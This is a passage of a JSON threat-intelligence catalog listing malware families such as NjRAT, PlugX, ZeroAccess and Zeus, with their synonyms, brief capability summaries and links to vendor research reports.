"value": "WebC2-Yahoo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60",
"value": "CukieGrab",
"description": "",
"meta": {
"synonyms": [
"Roblox Trade Assist"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/"
]
}
},
{
"uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf",
"value": "Stampedo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/"
]
}
},
{
"uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90",
"value": "Bredolab",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/",
"https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html"
]
}
},
{
"uuid": "d1298818-6425-49be-9764-9f119d964efd",
"value": "GoogleDrive RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
]
}
},
{
"uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f",
"value": "ReactorBot",
"description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under",
"http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
"http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/",
"http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html"
]
}
},
{
"uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8",
"value": "HTran",
"description": "",
"meta": {
"synonyms": [
"HUC Packet Transmit Tool"
],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
"https://www.secureworks.com/research/htran"
]
}
},
{
"uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b",
"value": "NjRAT",
"description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.",
"meta": {
"synonyms": [
"Bladabindi"
],
"type": [],
"refs": [
"http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
"http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf",
"http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
"https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services"
]
}
},
{
"uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca",
"value": "Tidepool",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf",
"http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/"
]
}
},
{
"uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7",
"value": "ZeroAccess",
"description": "",
"meta": {
"synonyms": [
"Max++",
"Smiscer"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
"http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
"http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
"https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
"http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html",
"http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
"http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
"https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/"
]
}
},
{
"uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae",
"value": "Micropsia",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
"http://blog.talosintelligence.com/2017/06/palestine-delphi.html"
]
}
},
{
"uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee",
"value": "PlugX",
"description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file.",
"meta": {
"synonyms": [
"Korplug"
],
"type": [],
"refs": [
"http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html",
"http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
"https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
"https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
"https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
"https://community.rsa.com/thread/185439",
"https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
"https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/",
"https://www.lac.co.jp/lacwatch/people/20171218_001445.html",
"https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
"https://securelist.com/time-of-death-connected-medicine/84315/",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
"http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
"http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html",
"https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf"
]
}
},
{
"uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493",
"value": "ChewBacca",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/"
]
}
},
{
"uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de",
"value": "Contopee",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks"
]
}
},
{
"uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00",
"value": "Asprox",
"description": "",
"meta": {
"synonyms": [
"Aseljo",
"BadSrc"
],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/",
"http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/"
]
}
},
{
"uuid": "8269e779-db23-4c94-aafb-36ee94879417",
"value": "DualToy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
]
}
},
{
"uuid": "ec50a75e-81f0-48b3-b1df-215eac646421",
"value": "NewCT",
"description": "",
"meta": {
"synonyms": [
"CT"
],
"type": [],
"refs": [
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf"
]
}
},
{
"uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84",
"value": "CrossRAT",
"description": "",
"meta": {
"synonyms": [
"Trupto"
],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x28.html",
"https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf"
]
}
},
{
"uuid": "3760920e-4d1a-40d8-9e60-508079499076",
"value": "Neutrino",
"description": "",
"meta": {
"synonyms": [
"Kasidet"
],
"type": [],
"refs": [
"https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/",
"https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
"https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
"http://securitykitten.github.io/an-evening-with-n3utrino/",
"https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/",
"https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/",
"http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html",
"https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex"
]
}
},
{
"uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2",
"value": "CryptoRansomeware",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/818369717371027456"
]
}
},
{
"uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2",
"value": "DROPSHOT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
"https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/",
"https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/"
]
}
},
{
"uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1",
"value": "BYEBY",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
]
}
},
{
"uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8",
"value": "PrincessLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/",
"https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/",
"https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/"
]
}
},
{
"uuid": "8a97307f-a029-4c43-88e1-debed2b80b14",
"value": "MAPIget",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "06ffb614-33ca-4b04-bf3b-623e68754184",
"value": "AnubisSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf",
"http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/"
]
}
},
{
"uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6",
"value": "Unidentified 006",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d9255166-79b3-49af-b676-c07fa9303d7e",
"value": "Winnti",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://401trg.pw/winnti-evolution-going-open-source/",
" https://401trg.pw/an-update-on-winnti/"
]
}
},
{
"uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2",
"value": "JackPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/"
]
}
},
{
"uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5",
"value": "OmniRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/",
"https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co"
]
}
},
{
"uuid": "7287a0b0-b943-4007-952f-07b9475ec184",
"value": "Filecoder",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/877811773826641920"
]
}
},
{
"uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b",
"value": "Popcorn Time",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malwrhunterteam/status/806595092177965058"
]
}
},
{
"uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7",
"value": "ShellBind",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry"
]
}
},
{
"uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5",
"value": "Serpico",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5",
"value": "Rakos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/"
]
}
},
{
"uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2",
"value": "ISMAgent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/ismagent/"
]
}
},
{
"uuid": "9441a589-e23d-402d-9603-5e55e3e33971",
"value": "Chthonic",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan"
]
}
},
{
"uuid": "3198501e-0ff0-43b7-96f0-321b463ab656",
"value": "Casper",
"description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/"
]
}
},
{
"uuid": "4166ab63-24b0-4448-92ea-21c8deef978d",
"value": "Hancitor",
"description": "",
"meta": {
"synonyms": [
"Chanitor"
],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear",
"https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/",
"http://www.morphick.com/resources/lab-blog/closer-look-hancitor",
"https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader",
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/",
"https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html",
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/",
"https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak",
"https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/"
]
}
},
{
"uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0",
"value": "Turla RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018",
"value": "PittyTiger RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf",
"https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/"
]
}
},
{
"uuid": "0df52c23-690b-4703-83f7-5befc38ab376",
"value": "Silence",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.intezer.com/silenceofthemoles/",
"https://securelist.com/the-silence/83009/"
]
}
},
{
"uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8",
"value": "w32times",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://attack.mitre.org/wiki/Group/G0022"
]
}
},
{
"uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58",
"value": "Kurton",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41",
"value": "MiniASP",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "de8e204c-fb65-447e-92bd-200e1c39648c",
"value": "Globe",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0",
"value": "Zeus SSL",
"description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample.",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d",
"value": "EvilOSX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/Marten4n6/EvilOSX",
"https://twitter.com/JohnLaTwC/status/966139336436498432"
]
}
},
{
"uuid": "faa19699-a884-4cd3-a307-36492c8ee77a",
"value": "CryptoNight",
"description": "WebAssembly-based crpyto miner.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec",
"https://twitter.com/JohnLaTwC/status/983011262731714565"
]
}
},
{
"uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370",
"value": "GlooxMail",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "619b9665-dac2-47a8-bf7d-942809439c12",
"value": "Harnig",
"description": "",
"meta": {
"synonyms": [
"Piptea"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html",
"https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html"
]
}
},
{
"uuid": "16794655-c0e2-4510-9169-f862df104045",
"value": "Bugat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436",
"value": "XBot POS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html"
]
}
},
{
"uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6",
"value": "ATMii",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/"
]
}
},
{
"uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f",
"value": "jSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/"
]
}
},
{
"uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e",
"value": "Salgorea",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf"
]
}
},
{
"uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271",
"value": "Alureon",
"description": "",
"meta": {
"synonyms": [
"TDL",
"Olmarik",
"TDSS",
"Pihar"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html",
"http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html",
"http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html"
]
}
},
{
"uuid": "275d65b9-0894-4c9b-a255-83daddb2589c",
"value": "SSHDoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html"
]
}
},
{
"uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c",
"value": "QHost",
"description": "",
"meta": {
"synonyms": [
"Tolouge"
],
"type": [],
"refs": []
}
},
{
"uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0",
"value": "Mangzamel",
"description": "",
"meta": {
"synonyms": [
"junidor",
"mengkite",
"vedratve"
],
"type": [],
"refs": [
"https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2"
]
}
},
{
"uuid": "57a6dbce-2d8a-44ae-a561-282d02935698",
"value": "Punkey POS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/",
"https://www.pandasecurity.com/mediacenter/malware/punkeypos/"
]
}
},
{
"uuid": "82733125-da67-44ff-b2ac-b16226088211",
"value": "ONHAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview"
]
}
},
{
"uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada",
"value": "Remexi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
"http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
]
}
},
{
"uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f",
"value": "Velso Ransomware",
"description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/"
]
}
},
{
"uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2",
"value": "Pykspa",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/",
"https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/",
"https://www.youtube.com/watch?v=HfSQlC76_s4"
]
}
},
{
"uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df",
"value": "DistTrack",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html",
"http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/",
"http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware",
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412",
"https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
"https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
]
}
},
{
"uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7",
"value": "PAS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
"https://blog.erratasec.com/2016/12/some-notes-on-iocs.html"
]
}
},
{
"uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8",
"value": "BTCWare",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/"
]
}
},
{
"uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e",
"value": "AVCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/"
]
}
},
{
"uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d",
"value": "Sisfader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/"
]
}
},
{
"uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b",
"value": "Cryptowall",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5c860744-bb12-4587-a852-ee060fd4dd64",
"value": "Plexor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
"https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/"
]
}
},
{
"uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207",
"value": "SeaDaddy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
]
}
},
{
"uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42",
"value": "Zebrocy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/"
]
}
},
{
"uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf",
"value": "Graftor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html"
]
}
},
{
"uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea",
"value": "MiKey",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger"
]
}
},
{
"uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf",
"value": "DarkHotel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/",
"https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/",
"http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html",
"https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/"
]
}
},
{
"uuid": "503ca41c-7788-477c-869b-ac530f20c490",
"value": "SendSafe",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "c513c490-7c76-42ab-a51f-cc780faa7146",
"value": "Multigrain POS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/",
"https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html"
]
}
},
{
"uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a",
"value": "rdasrv",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf"
]
}
},
{
"uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4",
"value": "Rurktar",
"description": "",
"meta": {
"synonyms": [
"RCSU"
],
"type": [],
"refs": [
"https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction"
]
}
},
{
"uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f",
"value": "Unidentified 048 (Lazarus?)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/DrunkBinary/status/1002587521073721346"
]
}
},
{
"uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5",
"value": "Nitol",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/"
]
}
},
{
"uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a",
"value": "Zeus",
"description": "",
"meta": {
"synonyms": [
"Zbot"
],
"type": [],
"refs": [
"https://zeustracker.abuse.ch/monitor.php",
